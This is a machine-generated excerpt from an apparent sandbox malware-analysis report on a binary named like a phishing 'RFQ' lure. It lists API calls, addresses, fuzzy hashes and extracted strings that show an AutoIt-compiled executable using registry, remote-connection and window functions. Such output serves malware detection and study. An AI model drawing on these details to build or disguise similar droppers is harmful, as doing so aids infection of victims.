                                                                                • Instruction Fuzzy Hash: 7F3114B1D083196ADF109FB68C8999FBFE8FF04750F50453BA50DEB281DA7865048F95
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0048A259
                                                                                • DestroyWindow.USER32(?,?), ref: 0048A2D3
                                                                                  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A34D
                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A36F
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A382
                                                                                • DestroyWindow.USER32(00000000), ref: 0048A3A4
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A3DB
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A3F4
                                                                                • GetDesktopWindow.USER32 ref: 0048A40D
                                                                                • GetWindowRect.USER32(00000000), ref: 0048A414
                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A42C
                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A444
                                                                                  • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                • String ID: 0$tooltips_class32
                                                                                • API String ID: 1297703922-3619404913
                                                                                • Opcode ID: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                                                • Instruction ID: 021702ee8d535e162beb7c83f4b22bae82635ac61efe1e234d944cc96a30802f
                                                                                • Opcode Fuzzy Hash: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                                                • Instruction Fuzzy Hash: CE719270141204AFE721DF18CC49F6B77E5FB88704F04492EF985972A0D7B8E956CB6A
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?), ref: 00484424
                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0048446F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharMessageSendUpper
                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                • API String ID: 3974292440-4258414348
                                                                                • Opcode ID: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
                                                                                • Instruction ID: 284482c989e2c3ea33895925bad2fd62e2b6eb619b8524f2c72ddc2562c3458e
                                                                                • Opcode Fuzzy Hash: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
                                                                                • Instruction Fuzzy Hash: BF917F712043119BCB04FF11C451A6EB7E1AF95358F44886EF8966B3A3DB38ED0ACB59
                                                                                APIs
                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0048B8B4
                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004891C2), ref: 0048B910
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0048B949
                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0048B98C
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0048B9C3
                                                                                • FreeLibrary.KERNEL32(?), ref: 0048B9CF
                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0048B9DF
                                                                                • DestroyIcon.USER32(?,?,?,?,?,004891C2), ref: 0048B9EE
                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0048BA0B
                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0048BA17
                                                                                  • Part of subcall function 00422EFD: __wcsicmp_l.LIBCMT ref: 00422F86
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                • String ID: .dll$.exe$.icl
                                                                                • API String ID: 1212759294-1154884017
                                                                                • Opcode ID: 2fc131844969b4b5c283f9404ec8a9d49153947123385b136b1911b68efed916
                                                                                • Instruction ID: 50163288b7a3e5e0cbad55d9f7afdff750af503695f4b02481751edd59ee4b0a
                                                                                • Opcode Fuzzy Hash: 2fc131844969b4b5c283f9404ec8a9d49153947123385b136b1911b68efed916
                                                                                • Instruction Fuzzy Hash: CC61F2B1900215BEEB14EF65DC41FBF7BA8FB08710F10491AF915D62C1DBB8A984DBA4
                                                                                APIs
                                                                                  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                  • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                • CharLowerBuffW.USER32(?,?), ref: 0046A3CB
                                                                                • GetDriveTypeW.KERNEL32 ref: 0046A418
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5
                                                                                  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                • API String ID: 2698844021-4113822522
                                                                                • Opcode ID: c9c3f5bcbb85441f6b74d870dff76a731b9fa90bff3ae6885b825ce50aabd4a2
                                                                                • Instruction ID: 3713139b98a23bb0435d921a878e050fdb512fde8566727adc807e41ed5eba46
                                                                                • Opcode Fuzzy Hash: c9c3f5bcbb85441f6b74d870dff76a731b9fa90bff3ae6885b825ce50aabd4a2
                                                                                • Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A
                                                                                APIs
                                                                                  • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
                                                                                • GetFocus.USER32 ref: 0048C20C
                                                                                • GetDlgCtrlID.USER32(00000000), ref: 0048C217
                                                                                • _memset.LIBCMT ref: 0048C342
                                                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C36D
                                                                                • GetMenuItemCount.USER32(?), ref: 0048C38D
                                                                                • GetMenuItemID.USER32(?,00000000), ref: 0048C3A0
                                                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C3D4
                                                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C41C
                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C454
                                                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C489
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                • String ID: 0
                                                                                • API String ID: 1296962147-4108050209
                                                                                • Opcode ID: 33cb3c6b8405937d32b2b71218590862bf0125915e4c77cd60d899db0884abe4
                                                                                • Instruction ID: c475bcefc4ba02209658d373736a3052ec3262963195f5d7aee57ef1aaf8ece4
                                                                                • Opcode Fuzzy Hash: 33cb3c6b8405937d32b2b71218590862bf0125915e4c77cd60d899db0884abe4
                                                                                • Instruction Fuzzy Hash: 17818870608301AFD710EF24D894A7FBBE8EB88714F004D2EF99597291D778D945CBAA
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 0047738F
                                                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
                                                                                • CreateCompatibleDC.GDI32(?), ref: 004773A7
                                                                                • SelectObject.GDI32(00000000,?), ref: 004773B4
                                                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
                                                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
                                                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00477468
                                                                                • SelectObject.GDI32(00000006,?), ref: 00477470
                                                                                • DeleteObject.GDI32(?), ref: 00477479
                                                                                • DeleteDC.GDI32(00000006), ref: 00477480
                                                                                • ReleaseDC.USER32(00000000,?), ref: 0047748B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                • String ID: (
                                                                                • API String ID: 2598888154-3887548279
                                                                                • Opcode ID: 84b276bb807c7e101a360103dd6cba862059a2a287156f3eb4aec643c0a6f74f
                                                                                • Instruction ID: dfe8a3419fea5eebfe22a8fe4a62b6ec684acb784746aa6277c3acce6f7982dd
                                                                                • Opcode Fuzzy Hash: 84b276bb807c7e101a360103dd6cba862059a2a287156f3eb4aec643c0a6f74f
                                                                                • Instruction Fuzzy Hash: 5D515871904209EFCB14CFA8CC84EAFBBB9EF49310F14852EF959A7211D735A945CB54
                                                                                APIs
                                                                                  • Part of subcall function 00420957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406B0C,?,00008000), ref: 00420973
                                                                                  • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00406CFA
                                                                                  • Part of subcall function 0040586D: _wcscpy.LIBCMT ref: 004058A5
                                                                                  • Part of subcall function 0042363D: _iswctype.LIBCMT ref: 00423645
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                • API String ID: 537147316-1018226102
                                                                                • Opcode ID: b6e2dc29c888ed8bfac3d35450cbb81efe1ddaa5dca943981e51a7583d2686c2
                                                                                • Instruction ID: 136c1bde332718f4234bbb9892b60201bfb37e26dd96c6a9a3310cb901d73b7e
                                                                                • Opcode Fuzzy Hash: b6e2dc29c888ed8bfac3d35450cbb81efe1ddaa5dca943981e51a7583d2686c2
                                                                                • Instruction Fuzzy Hash: 2C027D701083419FC714EF25C8419AFBBE5EF98318F54492FF486A72A2DB38D949CB5A
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00462D50
                                                                                • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00462DDD
                                                                                • GetMenuItemCount.USER32(004C5890), ref: 00462E66
                                                                                • DeleteMenu.USER32(004C5890,00000005,00000000,000000F5,?,?), ref: 00462EF6
                                                                                • DeleteMenu.USER32(004C5890,00000004,00000000), ref: 00462EFE
                                                                                • DeleteMenu.USER32(004C5890,00000006,00000000), ref: 00462F06
                                                                                • DeleteMenu.USER32(004C5890,00000003,00000000), ref: 00462F0E
                                                                                • GetMenuItemCount.USER32(004C5890), ref: 00462F16
                                                                                • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 00462F4C
                                                                                • GetCursorPos.USER32(?), ref: 00462F56
                                                                                • SetForegroundWindow.USER32(00000000), ref: 00462F5F
                                                                                • TrackPopupMenuEx.USER32(004C5890,00000000,?,00000000,00000000,00000000), ref: 00462F72
                                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00462F7E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                • String ID:
                                                                                • API String ID: 3993528054-0
                                                                                • Opcode ID: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                                                                • Instruction ID: dec7b0e441c84a99d0ab23afc077d39fee676e6f9a2472c44709d087c22ecc3a
                                                                                • Opcode Fuzzy Hash: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                                                                • Instruction Fuzzy Hash: AB71F670601A05BBEB219F54DD49FAABF64FF04314F10022BF615AA2E1D7FA5C10DB5A
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 004788D7
                                                                                • CoInitialize.OLE32(00000000), ref: 00478904
                                                                                • CoUninitialize.OLE32 ref: 0047890E
                                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 00478A0E
                                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00478B3B
                                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478B6F
                                                                                • CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478B92
                                                                                • SetErrorMode.KERNEL32(00000000), ref: 00478BA5
                                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478C25
                                                                                • VariantClear.OLEAUT32(?), ref: 00478C35
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                • String ID: ,,I
                                                                                • API String ID: 2395222682-4163367948
                                                                                • Opcode ID: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                                                                • Instruction ID: aabbb54c80bb5556d5779205c7c98f5c8569651e4766cb9ae3be61758569f7e0
                                                                                • Opcode Fuzzy Hash: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                                                                • Instruction Fuzzy Hash: 33C138B1604305AFC700DF25C88896BB7E9FF89348F00896EF9899B251DB75ED05CB56
                                                                                APIs
                                                                                  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                • _memset.LIBCMT ref: 0045786B
                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004578A0
                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004578BC
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004578D8
                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00457902
                                                                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0045792A
                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00457935
                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0045793A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                • API String ID: 1411258926-22481851
                                                                                • Opcode ID: 77803e0cf30d0c6a9af00fa7a29df62c406b8a667e1daf005490fda91c829b3b
                                                                                • Instruction ID: bd842348e8c291230e2108f9814d7b32575dde29d3ae902d03d2cd9f0e66d559
                                                                                • Opcode Fuzzy Hash: 77803e0cf30d0c6a9af00fa7a29df62c406b8a667e1daf005490fda91c829b3b
                                                                                • Instruction Fuzzy Hash: 3F41FB72C14129AADF11EBA5DC85DEEB778FF04314F40447AE905B22A1DB396D08CBA8
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper
                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                • API String ID: 3964851224-909552448
                                                                                • Opcode ID: a4df75a5d1017b7a8f535d2451c159b81df183318fde1907aaf5dc5abb7e2787
                                                                                • Instruction ID: 987af29362f030b9785e67816bde092fa47ad23058dcaf1b7a905610e89cab94
                                                                                • Opcode Fuzzy Hash: a4df75a5d1017b7a8f535d2451c159b81df183318fde1907aaf5dc5abb7e2787
                                                                                • Instruction Fuzzy Hash: 3C4183312142598BCF60FF11D891AEF3760AF21308F94882BFE5517292D77C9D1ACB69
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0043E2A0,00000010,?,Bad directive syntax error,0048F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0045F7C2
                                                                                • LoadStringW.USER32(00000000,?,0043E2A0,00000010), ref: 0045F7C9
                                                                                  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • _wprintf.LIBCMT ref: 0045F7FC
                                                                                • __swprintf.LIBCMT ref: 0045F81E
                                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0045F88D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
